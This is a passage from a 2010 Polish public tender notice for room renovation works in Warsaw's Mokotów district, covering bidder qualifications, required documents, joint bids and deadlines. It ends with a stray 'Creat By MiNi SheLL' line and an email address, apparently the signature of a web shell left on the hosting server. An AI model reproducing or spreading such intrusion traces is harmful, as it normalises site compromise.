2 roboty budowlane polegające na wykonaniu remontu lub adaptacji pomieszczeń w budynkach mieszkalnych lub użyteczności publicznej odpowiadające  przedmiotowi zamówienia, o wartości nie mniejszej niż 200.000,- zł brutto każda. W tym celu Wykonawca musi wypełnić wykaz robót stanowiący załącznik nr 6 do wzoru formularza oferty oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
1.2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca 
w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy,  o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełnienia warunku i za spełnienie tego warunku uzna złożenie oświadczenia, o którym mowa w pkt. 9.2.1.  siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający oceni jako spełniony, warunek dysponowania przez Wykonawcę osobami, które będą uczestniczyć w wykonywaniu zamówienia   na podstawie wykazu osób, oraz informacji o podstawie do dysponowania tymi osobami z którego wynikać będzie że Wykonawca dysponuje osobą/osobami, które będą odpowiadały za kierowanie robotami ogólnobudowlanymi, robotami w zakresie instalacji sanitarnych i elektrycznych oraz, że dysponuje osobami do wykonania zamówienia, z doświadczeniem i kwalifikacjami w wykonywaniu robót odpowiadających rodzajem przedmiotowi zamówienia. W w/w wykazie należy podać informacje na temat kwalifikacji zawodowych tych osób, uprawnień, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia,  a także zakresu wykonywanych przez nich czynności i podstawie do dysponowania nimi. W tym celu Wykonawca musi wypełnić wykaz osób stanowiący załącznik nr 7 do wzoru formularza oferty. 
2. Zamawiający oceni jako spełniony warunek, dysponowania przez Wykonawcę osobą z uprawnieniami wymaganymi ustawą prawo budowlane, która będzie uczestniczyć w wykonywaniu zamówienia na podstawie oświadczenia, z którego wynikać będzie, że Wykonawca dysponuje osobą/osobami do kierowania robotami budowlanymi będącymi przedmiotem zamówienia -posiadającymi odpowiednie uprawnienia budowlane bez ograniczeń do kierowania robotami w zakresie ogólnobudowlanym, instalacji sanitarnych, instalacji elektrycznych lub odpowiedni dokument stwierdzający przygotowanie zawodowe do kierowania budową i robotami w w/w zakresie ogólnobudowlanym, instalacji sanitarnych, instalacji elektrycznych oraz wpisanych na listę członków właściwych izb samorządu zawodowego. W tym celu Wykonawca musi złożyć oświadczenie na załączniku nr 8 do wzoru formularza oferty.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca 
w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy,  o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający oceni jako spełniony warunek sytuacji ekonomicznej i finansowej na podstawie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia potwierdzającej posiadanie w/w ubezpieczenia OC przez Wykonawcę na kwotę co najmniej 150.000 PLN.
2.Zamawiający oceni jako spełniony warunek sytuacji ekonomicznej i finansowej na podstawie sprawozdania finansowego albo jego części  a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o  badanym sprawozdaniu albo jego części, a w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności za 2009 rok, a jeżeli  okres prowadzenia działalności, jest krótszy - za ten okres potwierdzających wysokość posiadanych obrotów w 2009 r. roku nie mniejszych niż  300.000  PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony i podpisany formularz oferty zgodny w treści ze wzorem stanowiącym Rozdział II specyfikacji istotnych warunków zamówienia,
2. kosztorysy ofertowe (podpisane - parafowane - przez Wykonawcę na każdej stronie) sporządzone zgodnie z zapisem pkt. 16.2. niniejszej specyfikacji w oparciu o przedmiary robót, zawarte w Rozdziale IV, specyfikacji istotnych warunków zamówienia, obejmujące całość przedmiotu zamówienia,
3. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 9.5.1.2. niniejszej specyfikacji, jeżeli oferty będą składali Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,
4.oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 14.6.3. niniejszej specyfikacji, jeśli oferta będzie podpisana przez pełnomocnika,
5. informację o części / częściach zamówienia, które Wykonawca zamierza powierzyć podwykonawcom, o ile Wykonawca będzie realizował zamówienie z udziałem podwykonawców,
6. informację o podmiotach, które będą brały udział w realizacji  części  zamówienia, na zasobach, których polega wykonawca na zasadach określonych  w pkt 8.2. siwz, 
7. oświadczenie o zapoznaniu się i akceptacji dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót na załączniku nr 1 wg wzoru załączonego do wzoru formularza oferty, 
8. 	zobowiązanie do wniesienia zabezpieczenia należytego wykonania umowy 
na załączniku nr 2 do oferty wg wzoru załączonego do wzoru formularza oferty, 
9. oświadczenie na załączniku nr 3 do oferty wg wzoru załączonego do wzoru formularza oferty, iż po upływie terminu ważności będzie odnawiać ubezpieczenie na kwotę nie niższą niż równowartość 150.000 złotych polskich na czas obejmujący wykonanie przedmiotu zamówienia oraz, że przedłoży Zamawiającemu do wglądu oryginał odnowionego ubezpieczenia w terminie 7 dni kalendarzowych od daty jego zawarcia, jednakże nie później niż w dniu podpisania umowy w przypadku gdy dotychczasowe ubezpieczenie wygasa po terminie składania ofert, 
10.  informacji określonej w pkt. 16.1.2. niniejszej specyfikacji w przypadku 	zastosowania  przez wykonawcę innej niż (22 % ) stawki podatku od towarów 
	i usług,
11. oświadczenie Wykonawcy zawierające wzór dokumentu gwarancyjnego 	określającego zakres gwarancji na załączniku nr 4 do  oferty wg wzoru załączonego 	do wzoru formularza oferty, potwierdzające udzielenie gwarancji  na przedmiot 	składanej przez siebie oferty na okres nie krótszy niż wskazany w pkt. 3.niniejszej specyfikacji,
12. W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, o  których mowa w pkt 8 SIWZ, Wykonawca zobowiązany jest złożyć wraz z ofertą następujące dokumenty: 

12.1. dokumenty potwierdzające, że  roboty wykazane przez Wykonawcę w załączniku nr 6 do oferty (zgodnie z zapisem pkt. 8.1.1. i 9.2.2. specyfikacji istotnych warunków zamówienia) zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,
12.2. W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu: 
12.2.1. pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
12.2.2. pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów. 
13. Oferta wspólna
11.5.1. Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 Ustawy) pod warunkiem, że taka oferta spełniać będzie następujące wymagania: 
11.5.1.1. Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;
11.5.1.2. Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza lub inny dokument (np. Umowa konsorcjum, spółki cywilnej) powinien być załączony do oferty i zawierać w szczególności wskazanie: 
a) postępowania o zamówienie publiczne, którego dotyczy;
b) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;
c)	ustanowionego Pełnomocnika oraz zakres jego umocowania;
11.5.1.3. Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. 
11.5.1.4. Każdy z Wykonawców (każdy członek konsorcjum)  składających ofertę wspólną musi wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 24 ust. 1 ustawy. W tym celu konsorcjum składa oświadczenie, o którym mowa w pkt. 9.3.1. specyfikacji istotnych warunków zamówienia podpisane przez wszystkich Wykonawców oraz dokumenty określone w pkt. 9.3.2. i 9.3.8. specyfikacji istotnych warunków zamówienia   dla wszystkich Wykonawców podpisane za zgodność z oryginałem przez Wykonawców.
11.5.1.5. W odniesieniu do warunków określonych w art. 22 ust. 1 ustawy 
wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę wspólną (na ich potwierdzenie należy złożyć dokumenty określone w pkt. 9.2. specyfikacji istotnych warunków zamówienia)  z zastrzeżeniem, że oświadczenie, o którym mowa w pkt. 9.2.1. specyfikacji istotnych warunków zamówienia podpisane przez Pełnomocnika lub wszystkich Wykonawców musi być złożone w imieniu wszystkich  Wykonawców;
11.5.2. 	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie 
z Pełnomocnikiem, którego adres należy wpisać w formularzu oferty.
11.5.3.  Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.
11.6. W przypadku złożenia oferty wspólnej Wykonawcy solidarnie odpowiadać będą za wykonanie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień umowy  zawartej w wyniku rozstrzygnięcia przedmiotowego postępowania, o ile warunkiem wprowadzenia takich zmian będą między innymi okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te będą korzystne dla Zamawiającego oraz w przypadku zmiany porządku prawnego, a także w przypadku zmian zawartych w specyfikacji istotnych warunków zamówienia w tym: 
1.1. w przypadku wystąpienia okoliczności uniemożliwiających prowadzenie robót zgodnie z technologią ich wykonania termin realizacji robót może ulec zmianie. Zostanie on wydłużony o okres, na który roboty zostały wstrzymane. Fakt ten musi być potwierdzony wpisem Zamawiającego do dziennika robót, o którym mowa w ust. 6.
1.2. Zamawiający zastrzega sobie możliwość rezygnacji z wykonania części robót objętych Zamówieniem, nie więcej jednak niż 20 % wartości zamówienia. 
1.3. Wykonawca w trakcie realizacji przedmiotu zamówienia może dokonać zmiany Podwykonawców w sytuacji, gdy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy, koniecznym będzie dla prawidłowego wykonania umowy posłużenie się przez Wykonawcę nowymi Podwykonawcami, którzy będą realizowali część lub cały zakres powierzony uprzednio innym Podwykonawcom.
1.4. w przypadku zaistnienia konieczności wykonania robót dodatkowych, które nie zostały przewidziane w przedmiarze robót stanowiącym Rozdział IV siwz, Wykonawca zobowiązany jest wykonać je na odrębne zlecenie Zamawiającego. Wartość robót dodatkowych nie może  przekroczyć 50% wartości realizowanego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgnmokotow.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy ul. Irysowa 19 02-660 Warszawa Dział Zamowień Publicznych pok. nr 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2010 godzina 10:00, miejsce: Zakład Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy ul. Irysowa 19 02-660 Warszawa Dział Zamówień Publicznych pok. nr 34.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com